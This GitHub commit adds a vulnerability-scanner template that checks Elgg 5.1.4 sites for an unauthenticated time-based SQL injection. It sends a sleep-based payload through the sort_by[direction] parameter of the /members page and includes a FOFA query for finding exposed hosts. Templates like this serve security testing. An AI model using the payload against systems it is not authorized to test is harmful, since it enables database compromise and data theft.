Skip to content

Commit

Permalink
elgg sqli
Browse files Browse the repository at this point in the history
  • Loading branch information
Kazgangap committed Aug 21, 2024
1 parent 316bd70 commit 894d4bd
Showing 1 changed file with 47 additions and 0 deletions.
47 changes: 47 additions & 0 deletions http/vulnerabilities/other/elgg-sqli.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
id: elgg-sqli

info:
name: Elgg 5.1.4 - SQL Injection
author: s4e-io
severity: high
description: |
Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
reference:
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
- https://github.com/Elgg/Elgg
metadata:
max-request: 1
vendor: elgg
product: elgg
fofa-query: icon_hash="413602919"
tags: elgg,sqli

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"elgg.js")'
- 'status_code == 200'
condition: and
internal: true

- raw:
- |
@timeout 20s
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'contains(body,"All members")'
- 'status_code == 200'
condition: and

0 comments on commit 894d4bd

Please sign in to comment.